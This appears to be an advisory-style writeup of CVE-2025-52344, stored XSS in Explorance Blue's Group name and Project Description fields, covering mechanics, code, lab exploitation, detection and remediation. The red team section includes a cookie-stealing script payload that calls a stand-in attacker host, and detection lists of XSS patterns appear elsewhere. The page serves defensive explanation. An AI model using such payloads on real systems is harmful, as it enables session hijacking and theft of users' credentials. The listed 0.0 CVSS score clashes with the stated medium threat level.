CVE-2025-52344
Executive Summary
CVE-2025-52344 identifies multiple stored Cross-Site Scripting (XSS) vulnerabilities in Explorance Blue version 8.1.2. The vulnerabilities exist in the Group name and Project Description input fields, allowing an attacker to inject arbitrary JavaScript code that executes in the context of a victim's browser. This can lead to session hijacking, credential theft, or defacement. No official patch has been released, and no public exploit code is available at this time.

Supply Chain & Package Security
This vulnerability is not related to an open-source package manager (NPM, PyPI, Go, Ruby). It affects a proprietary enterprise application (Explorance Blue). Therefore, supply chain security considerations are limited to the vendor's distribution channels and internal update mechanisms.
CVSS Breakdown & Threat Level
- CVSS Score: 0.0 (NVD base score not assigned; estimated based on vector)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
- Threat Level: Medium (due to user interaction requirement but low complexity)
Deep Dive & Mechanics
The vulnerability is a classic stored XSS. The application fails to sanitize user-supplied input in the "Group name" and "Project Description" fields. When an administrator or user with appropriate privileges creates or edits a group or project, the malicious payload is stored in the database. Subsequently, when any user views the affected group or project page, the payload is rendered in the browser without proper encoding, leading to script execution.
The attack flow:
- Attacker logs in with sufficient privileges to create/edit groups or projects.
- Attacker enters a payload such as
<script>alert('XSS')</script>in the Group name or Project Description field. - The payload is stored in the database.
- Victim navigates to the page displaying the group or project.
- The browser executes the injected script.
Vulnerable vs. Patched Code
Since no patch is available, we can only describe the vulnerable code pattern. The application likely uses a server-side language (e.g., Java, .NET) to render user input without proper output encoding.
Vulnerable Code (Conceptual):
// Vulnerable: Directly outputting user input without encoding
String groupName = request.getParameter("groupName");
out.println("<div>" + groupName + "</div>");
Patched Code (Conceptual):
// Patched: Using output encoding
String groupName = request.getParameter("groupName");
String encodedGroupName = Encode.forHtml(groupName);
out.println("<div>" + encodedGroupName + "</div>");
Exploitation & Lab Setup
Red Team
Lab Setup:
- Deploy Explorance Blue 8.1.2 in a controlled environment (e.g., Docker or VM).
- Create a user account with permissions to create/edit groups and projects.
- Log in and navigate to the group creation page.
Exploitation Steps:
- In the "Group name" field, inject the following payload:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save the group.
- As a victim user, navigate to the group list or view the group.
- The script executes, sending the victim's cookies to the attacker's server.
Note: No public exploit code is available. The above is a conceptual demonstration.
Blue Team
Detection:
- Monitor for unusual input patterns in Group name and Project Description fields (e.g.,
<script>,onerror=,javascript:). - Review web server logs for requests containing XSS payloads.
- Use WAF rules to block common XSS patterns.
Hunting:
- Search database for stored XSS payloads in the relevant columns.
- Analyze user activity logs for creation of groups/projects with suspicious names.
Indicators of Compromise (IOCs)
- Network IOCs:
- Outbound HTTP requests to attacker-controlled domains from the Blue application server.
- Requests containing
document.cookieorfetchin the URL parameters.
- Host IOCs:
- Log entries showing
<script>tags in Group name or Project Description fields. - Unusual JavaScript execution in browser developer tools.
- Log entries showing
- File IOCs:
- None specific to this CVE.

Remediation & Mitigation
Immediate Actions:
- Input Validation: Implement strict server-side validation to reject HTML/JavaScript in Group name and Project Description fields.
- Output Encoding: Apply context-aware output encoding (e.g., HTML entity encoding) when rendering user input.
- Content Security Policy (CSP): Deploy a strict CSP header to mitigate XSS impact (e.g.,
script-src 'self'). - Web Application Firewall (WAF): Deploy WAF rules to block common XSS payloads.
Long-Term Fix:
- Vendor must release a patch that sanitizes input and encodes output. Until then, consider disabling the affected input fields or restricting access to trusted users only.
Workaround:
- Use a reverse proxy to inspect and sanitize POST requests containing
groupNameorprojectDescriptionparameters.
